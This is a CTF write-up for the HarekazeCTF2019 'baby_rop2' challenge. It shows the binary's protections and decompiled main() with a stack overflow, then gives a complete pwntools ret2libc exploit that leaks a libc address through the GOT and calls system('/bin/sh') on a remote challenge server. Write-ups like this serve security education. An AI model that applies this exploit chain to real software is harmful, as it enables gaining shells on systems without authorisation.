
[HarekazeCTF2019]baby_rop2

https://github.com/TeamHarekaze/HarekazeCTF2019-challenges/raw/master/baby_rop_2/attachments/libc.so.6


checksec

[*] '/home/zelas/Desktop/pwn/[HarekazeCTF2019]baby_rop2/babyrop2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

main()

// IDA pseudocode of the challenge's main(): reads a name into a fixed stack
// buffer and echoes it back. Both the read length and the terminator index
// are unchecked, which is the overflow the writeup below exploits.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[28]; // [rsp+0h] [rbp-20h] BYREF
int v5; // [rsp+1Ch] [rbp-4h]

setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
printf("What's your name? ");
v5 = read(0, buf, 0x100uLL); // stack overflow: up to 0x100 bytes are read into a 28-byte buffer (the bound should be sizeof(buf) - 1)
buf[v5 - 1] = 0; // return value is not checked: v5 == 0 (EOF) or -1 (error) writes a NUL below buf
printf("Welcome to the Pwn World again, %s!\n", buf);
return 0;
}

无可疑字符串

无可疑函数

0x02


思路 ret2libc x64

1.利用read()处溢出泄露read_got

2.利用LibcSearcher计算出system()和/bin/sh的地址

3.再次执行main(),再次溢出至system()

s 0x20
rbp 0x8
pop_rdi_ret read_got
ret printf()
printf_ret main()
s 0x20
rbp 0x8
pop_rdi_ret /bin/sh
ret system()
sys_ret 0xdeadbeef

0x03


exp

from pwn import *

# ret2libc against babyrop2. The checksec output above explains why each step
# works: no PIE means the gadget/PLT/GOT addresses below are fixed, no canary
# means the overflow reaches the saved return address, NX means the chain must
# reuse existing code (ROP) instead of injecting it, and partial RELRO leaves
# the GOT readable so a libc pointer can be leaked from it.
context(os='linux', arch='amd64', log_level='debug')
# io = process(['./babyrop2'])
io = remote('node4.buuoj.cn', 28018)
elf = ELF('./babyrop2')
libc = ELF('./libc.so.6')  # the libc shipped with the challenge; offsets are taken from it directly

# buf lives at rbp-0x20 (see the IDA listing), so 0x20 bytes reach the saved
# rbp and 8 more reach the return address.
padding = 0x20 + 0x8
pop_rdi_ret = 0x400733  # "pop rdi; ret" gadget in the binary (usable because there is no PIE)
printf_plt = 0x4004f0  # printf@plt
read_got = elf.got['read']  # GOT slot holding read()'s resolved libc address

print('[+] read_got', hex(read_got))

# Chain 1: printf(read_got) prints the pointer stored in the GOT, then returns
# into main so the same overflow can be triggered a second time.
main = 0x400636
payload = flat(b'a' * padding, pop_rdi_ret, read_got, printf_plt, main)
delim1 = b'What\'s your name?'
io.sendlineafter(delim1, payload)
# The leaked pointer is printed as raw bytes; reading up to the 0x7f byte and
# keeping the last 6 bytes assumes a typical userspace libc mapping whose
# address starts with 0x7f (little-endian, so 0x7f is the last byte printed).
delim2 = b'\x7f'
read_addr = u64(io.recvuntil(delim2)[-6:].ljust(8, b'\x00'))
print('[+] read_addr', hex(read_addr))

# libc base = leaked address of read() minus read()'s offset inside libc.so.6;
# system() and the "/bin/sh" string are then located relative to that base.
libc_base = read_addr - libc.symbols['read']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()

print('[+] libc_base_addr', hex(libc_base))
print('[+] system_addr', hex(system))
print('[+] bin_sh_addr', hex(bin_sh))

# Chain 2: same overflow in the re-entered main(), this time returning into
# system("/bin/sh").
payload1 = flat(b'a' * padding, pop_rdi_ret, bin_sh, system)
sleep(1)  # presumably waits for the re-entered main() to reach its read() before the second payload is sent
io.sendline(payload1)
io.interactive()

